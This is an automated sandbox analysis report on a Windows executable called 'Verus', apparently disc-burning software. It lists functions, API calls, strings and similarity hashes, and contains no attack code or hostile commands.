_strncmp.LIBCMT ref: 00427085
_swscanf.LIBCMT ref: 004270B7

Part of subcall function 0049266C: __wcstoi64.LIBCMT ref: 00492662

Strings

addr: %8ld cnt: %ld, xrefs: 004270A1
Time total: , xrefs: 00427174
addr: , xrefs: 0042707F
end: , xrefs: 00426FEC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp$__wcstoi64_swscanf
String ID: Time total: $addr: $addr: %8ld cnt: %ld$end:
API String ID: 3152953075-4035492515
Opcode ID: f1563053a7281a0b620e73fde6da2f8d74b30d389a8ac2b6116c5b602a5b5234
Instruction ID: 02ef9324a2d0658e4ab3fbb3e68a0024d48af894ddcce91b6ed0671db8f51276
Opcode Fuzzy Hash: f1563053a7281a0b620e73fde6da2f8d74b30d389a8ac2b6116c5b602a5b5234
Instruction Fuzzy Hash: AC5193B16047009BD310EF26C881B9BB7E4EFC4720F50891EFDA997351E639A544CBAA

Function 00466EF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123windowtimeCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00466F1C
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,00417727,00539B48,00000001,00000000,0000008C,00539B48,00000000,0000008C), ref: 00466F25
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00466FE1
_vswprintf_s.LIBCMT ref: 00466FF6
SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046704C
SendMessageW.USER32(?,0000101E,00000001,0000FFFF), ref: 00467061
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00467072

Strings

%.2d:%.2d:%.2d, xrefs: 00466F41

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$LocalTime_vswprintf_s
String ID: %.2d:%.2d:%.2d
API String ID: 358171219-3609746601
Opcode ID: 7ec552b159817a6fe091e884227dadb75bac1d50ad951d86d7d5d4c9097397d6
Instruction ID: 133b7e3d59e23e4a0904406d34e0b7616f0c9943314c8ec7cd505256ceb9e1b2
Opcode Fuzzy Hash: 7ec552b159817a6fe091e884227dadb75bac1d50ad951d86d7d5d4c9097397d6
Instruction Fuzzy Hash: D94108B1508341AFD394DF29D881B6BBBE4FFC8704F004E2EF699D6290E7B499448B56

Function 0041EF00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00462EA0: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,000F003F,?,?,?,?,0041EF6E,?,00000000), ref: 00462EB8

Part of subcall function 00462F90: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,AD5E0258,0041EF8E,004C49AC,?,00000080,?,00000000), ref: 00462FAF

Part of subcall function 00462F00: RegCloseKey.ADVAPI32(?,0041EF9F,004C49AC,?,00000080,?,00000000), ref: 00462F04

lstrcmpW.KERNEL32(?,004C49AC,004C49AC,?,00000080,?,00000000), ref: 0041EFA9
lstrcpyW.KERNEL32(?,?), ref: 0041EFCA
lstrcatW.KERNEL32(?,\shell\open\command), ref: 0041EFDF

Part of subcall function 00462EA0: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,?,0041EF6E,?,00000000), ref: 00462EE8

lstrcpyW.KERNEL32(?,004C4C54,?,00000000), ref: 0041F009
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 0041F01A
lstrcatW.KERNEL32(?,004C4C54), ref: 0041F02D
lstrlenW.KERNEL32(?,004C49AC,?,00000208), ref: 0041F056

Strings

\shell\open\command, xrefs: 0041EFD2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcatlstrcpy$CloseCreateFileModuleNameOpenQueryValuelstrcmplstrlen
String ID: \shell\open\command
API String ID: 2496833147-3053425699
Opcode ID: 0672556a976f3f1d437286fc56fb57d33e47cd8563639e027dbc8f4f5d9ed80b
Instruction ID: 0cee839503808298dd39dfc0ebbd0186adc995a39e8fb4f6546ad8b8194cbcd3
Opcode Fuzzy Hash: 0672556a976f3f1d437286fc56fb57d33e47cd8563639e027dbc8f4f5d9ed80b
Instruction Fuzzy Hash: 6E41B071108340AEC764DF60DD52FEBB7E8ABC4710F40492EB599831D1EBB9A509CB6B

Function 00434240 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000400,?), ref: 0043428F
SetDlgItemTextW.USER32(?,00000401,?), ref: 004342B4
SetDlgItemTextW.USER32(?,00000404,?), ref: 004342D9
SetDlgItemTextW.USER32(?,00000405,?), ref: 004342FE
SetDlgItemTextW.USER32(?,00000407,?), ref: 00434323
SetDlgItemTextW.USER32(?,00000409,?), ref: 00434348
SetDlgItemTextW.USER32(?,0000040F,?), ref: 0043436D

Strings

device, xrefs: 00434255

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: device
API String ID: 3367045223-154121870
Opcode ID: be7ac5d308a99a3fbfa327e8f2bd71754bbd74ab14abbe73d9a2714c0c84692e
Instruction ID: d88009b95b14546328afc085b4f930ac121ac82cb6afbd113fe5488492cd464c
Opcode Fuzzy Hash: be7ac5d308a99a3fbfa327e8f2bd71754bbd74ab14abbe73d9a2714c0c84692e
Instruction Fuzzy Hash: 70311EF52446007FD608DB90DC82DBBA35AEBC4714F10D96EBB566B282DA74F8068B54

Function 0041AF00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,0000041F,?), ref: 0041AF4F
SetDlgItemTextW.USER32(?,00000420,?), ref: 0041AF74
SetDlgItemTextW.USER32(?,00000421,?), ref: 0041AF99
SetDlgItemTextW.USER32(?,00000422,?), ref: 0041AFBE
SetDlgItemTextW.USER32(?,00000423,?), ref: 0041AFE3
SetDlgItemTextW.USER32(?,00000424,?), ref: 0041B008
SetDlgItemTextW.USER32(?,00000425,?), ref: 0041B02D

Strings

burn, xrefs: 0041AF15

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: burn
API String ID: 3367045223-1431444740
Opcode ID: a4965103b1959a39585669fd0906938b1604e8fe5daff3e11386f1ba076a043b
Instruction ID: cadf457403546f1b465e432fa20e976765eea0249777eb4a233db0b1f60562fd
Opcode Fuzzy Hash: a4965103b1959a39585669fd0906938b1604e8fe5daff3e11386f1ba076a043b
Instruction Fuzzy Hash: C83150F53443007FD608EB50DD92DBBA36AEBC4714F10C96EBB564B282DA74E805CB59

Function 00426B30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00426B40
_strncmp.LIBCMT ref: 00426B57
_strncmp.LIBCMT ref: 00426BA5

Strings

BLANK, xrefs: 00426B4E
Re-load, xrefs: 00426BDC
This drive or, xrefs: 00426B38
Blanking time:, xrefs: 00426B9F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp
String ID: BLANK$Blanking time:$Re-load$This drive or
API String ID: 909875538-71028432
Opcode ID: a45ec5d0023bdcac3ba6552b912199605f6d58ed2ae8b577570b014ebe2e9f31
Instruction ID: 972431a0eb0f3a5f89b10d8c8cf3ad22fcfe057586504974c6dbd7a4877f9275
Opcode Fuzzy Hash: a45ec5d0023bdcac3ba6552b912199605f6d58ed2ae8b577570b014ebe2e9f31
Instruction Fuzzy Hash: 962128753007006BDA20EB25DC02F6BB3549FD6B24F02061EFE1997381EA79F841C6A9

Function 00423100 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64processCOMMON

Download Yara Rule

APIs

Part of subcall function 00444320: IsWindow.USER32(?), ref: 00444336
Part of subcall function 00444320: _vswprintf_s.LIBCMT ref: 0044435A
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 0044436C
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0044437F
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 0044438E
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,AD5E02B4), ref: 0044439C
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 004443A2
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004443AF
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004443BE
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,004C91E0), ref: 004443D0
Part of subcall function 00444320: lstrlenW.KERNEL32(AD5E02B4), ref: 004443E4

_memset.LIBCMT ref: 00423133
CreateProcessW.KERNEL32 ref: 00423187
GetLastError.KERNEL32 ref: 00423191
CloseHandle.KERNEL32(00000000), ref: 004231C0

Strings

Command line = %s., xrefs: 0042311B
CConsolePipe::CreateProcess, xrefs: 00423105
D, xrefs: 00423172
Error: CreateProcess failed, last error = %d., xrefs: 00423198

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$LengthText$CloseCreateErrorHandleLastProcess_memset_vswprintf_slstrlen
String ID: Command line = %s.$ Error: CreateProcess failed, last error = %d.$CConsolePipe::CreateProcess$D
API String ID: 4190539046-646333122
Opcode ID: 8df93ed731a7e4e4527ba68c4be02ca13ee12fad33bb44ad355ca219329e4d51
Instruction ID: bbfb5c3f6bf9263634f4227415da141a8bf544af5d08b9c55a6c127a5f48ea35
Opcode Fuzzy Hash: 8df93ed731a7e4e4527ba68c4be02ca13ee12fad33bb44ad355ca219329e4d51
Instruction Fuzzy Hash: 781172B56043407BD324DF55DC46F9BBBA9BFC4714F00881EF68547250EBB5A4488BAA

Function 0045C980 Relevance: 13.6, APIs: 9, Instructions: 143stringtimewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004593F0: lstrlenW.KERNEL32(00000000,00000000), ref: 0045943D
Part of subcall function 004593F0: _wcsncpy.LIBCMT ref: 0045945A
Part of subcall function 004593F0: lstrcatW.KERNEL32(?, (%u),?), ref: 00459485

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

lstrcpyW.KERNEL32(00000000,00000000), ref: 0045CA39
lstrcatW.KERNEL32(00000000,00000000), ref: 0045CA4F
lstrcatW.KERNEL32(00000000,004CA150), ref: 0045CA57
SHGetFileInfoW.SHELL32(004C49AC,00000010,?,000002B4,00000410), ref: 0045CA77
lstrcpyW.KERNEL32(?,004C49AC), ref: 0045CAA4
GetLocalTime.KERNEL32(?), ref: 0045CAAF
SystemTimeToFileTime.KERNEL32(?,?), ref: 0045CABF
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0045CADA
SendMessageW.USER32(?,00001102,00000002,?), ref: 0045CB35

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Time$Filelstrcat$lstrcpy$DateInfoLocalMessageSendSystem_malloc_wcsncpylstrlen
String ID:
API String ID: 1571020024-0
Opcode ID: 5f79ae2581382a348631b950c3083aedbef86a81a4c07dc258d28f2f62d54a41
Instruction ID: 1e03f5bbcb57368872a3ad1a7c44d682fe8a481858052ebeddc33c8861bd7d5e
Opcode Fuzzy Hash: 5f79ae2581382a348631b950c3083aedbef86a81a4c07dc258d28f2f62d54a41
Instruction Fuzzy Hash: 5651B1B1204305AFD354DF61DD95FABB7E9FBC8704F00492EB94687291DA78A804CB69

Function 004463E0 Relevance: 13.6, APIs: 9, Instructions: 132stringwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004770E0: lstrlenW.KERNEL32(?,?,00420E28,?,0000007C), ref: 004770E6

Part of subcall function 0046ED60: lstrcmpW.KERNEL32(?,40000000,?,40000000,40000000,?,0045BE9D,?,?), ref: 0046EDAA

MessageBoxW.USER32(?,?,00000000,00000010), ref: 004464A7
SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00000410), ref: 004464E6
lstrcpyW.KERNEL32(?,?), ref: 004464FF
GetClientRect.USER32(?,?), ref: 00446564
InvalidateRect.USER32(?,?,00000001), ref: 00446578

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Rect$ClientFileInfoInvalidateMessage_vswprintf_slstrcmplstrcpylstrlen
String ID:
API String ID: 2702989752-0
Opcode ID: 22c9b964684ccddc5fce68c965a472b83c62efa1e154d1a91f1fb968dab1321c
Instruction ID: 8d3c546749f91f615f468edeb1cd714fcc7db74dcc18222931c0b4530a135979
Opcode Fuzzy Hash: 22c9b964684ccddc5fce68c965a472b83c62efa1e154d1a91f1fb968dab1321c
Instruction Fuzzy Hash: 1741C9B1600300ABE714AB65DC55FBF73ACBBC8704F044A1EF54A972C1EB78E900876A

Function 0044E790 Relevance: 13.6, APIs: 9, Instructions: 126windowCOMMON

Download Yara Rule

APIs

IsWindowEnabled.USER32(?), ref: 0044E7C1
GetFocus.USER32 ref: 0044E7D9
SendMessageW.USER32(?,0000045A,?,?), ref: 0044E809
MessageBeep.USER32(00000000), ref: 0044E81A
GetClientRect.USER32(?,?), ref: 0044E83F
SendMessageW.USER32(?,0000041D,?,?), ref: 0044E869
SendMessageW.USER32(?,00000417,?,?), ref: 0044E893
PostMessageW.USER32(?,00000100,00000028,00000000), ref: 0044E8B6
MessageBeep.USER32(00000000), ref: 0044E8D0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$Send$Beep$ClientEnabledFocusPostRectWindow
String ID:
API String ID: 787769824-0
Opcode ID: 7f09795fbe9450cadaf693264a90c1d1309d1c88f3a95a65e48f29902d3e8504
Instruction ID: 338487238a91457f851d04627ea4b8f3f8f2d872b8d0066c18920c8235659f50
Opcode Fuzzy Hash: 7f09795fbe9450cadaf693264a90c1d1309d1c88f3a95a65e48f29902d3e8504
Instruction Fuzzy Hash: BF41F7B1A083049FE754EF2AD884A2BB7E5BBC9740F104D2EF586C3251D775A8048B5A

Function 004BE060 Relevance: 13.6, APIs: 9, Instructions: 118filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000020,00000000), ref: 004BE085
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 004BE0AB
CloseHandle.KERNEL32(000000FF), ref: 004BE0C2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a389bf3644d90d89d8fa1f97d950724b014bca35b03b53815c129b559e1d6605
Instruction ID: b8a5e21c772ea0fb23986c0afeb26077efc8d6da920d17e34fcd3cdcf9a9d156
Opcode Fuzzy Hash: a389bf3644d90d89d8fa1f97d950724b014bca35b03b53815c129b559e1d6605
Instruction Fuzzy Hash: D5416276900208ABCF10DFF6DC55EEF77BCAB99301F10852AF602A7141E63996069B74

Function 00469110 Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?,AD5E0258), ref: 00469157
GetClientRect.USER32(?,?), ref: 00469171
CreateCompatibleDC.GDI32(?), ref: 0046917C
SelectObject.GDI32(00000000,?), ref: 0046918F
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 004691E3
SelectObject.GDI32(00000000,00000000), ref: 004691EB
ReleaseDC.USER32(?,?), ref: 004691FC
ReleaseDC.USER32(?,00000000), ref: 00469203
EndPaint.USER32(?,?), ref: 0046920F

Part of subcall function 00468DE0: GetStockObject.GDI32(00000011), ref: 00468DEB
Part of subcall function 00468DE0: SelectObject.GDI32(?,00000000), ref: 00468DFD
Part of subcall function 00468DE0: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00468E14
Part of subcall function 00468DE0: FillRect.USER32 ref: 00468E47
Part of subcall function 00468DE0: SetBkColor.GDI32(?,00FFFFFF), ref: 00468E53
Part of subcall function 00468DE0: GetSysColor.USER32(00000008), ref: 00468E5B
Part of subcall function 00468DE0: SetTextColor.GDI32(?,00000000), ref: 00468E63
Part of subcall function 00468DE0: DrawTextW.USER32(?,?,?,?,00008020), ref: 00468E7C
Part of subcall function 00468DE0: SelectObject.GDI32(?,?), ref: 00468E88
Part of subcall function 00468DE0: GetObjectW.GDI32(?,00000018,?), ref: 00468E95

Part of subcall function 00468C60: GetObjectW.GDI32(?,00000018,?), ref: 00468C8E
Part of subcall function 00468C60: GetWindowRect.USER32(?,?), ref: 00468CB1

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Object$Select$ColorRectText$PaintRelease$BeginClientCompatibleCreateDrawExtentFillPoint32StockWindow
String ID:
API String ID: 3212167338-0
Opcode ID: 6bda259f35190cd4bf27519d42827f834eadd37d55460c6c8f99338a76d9e45b
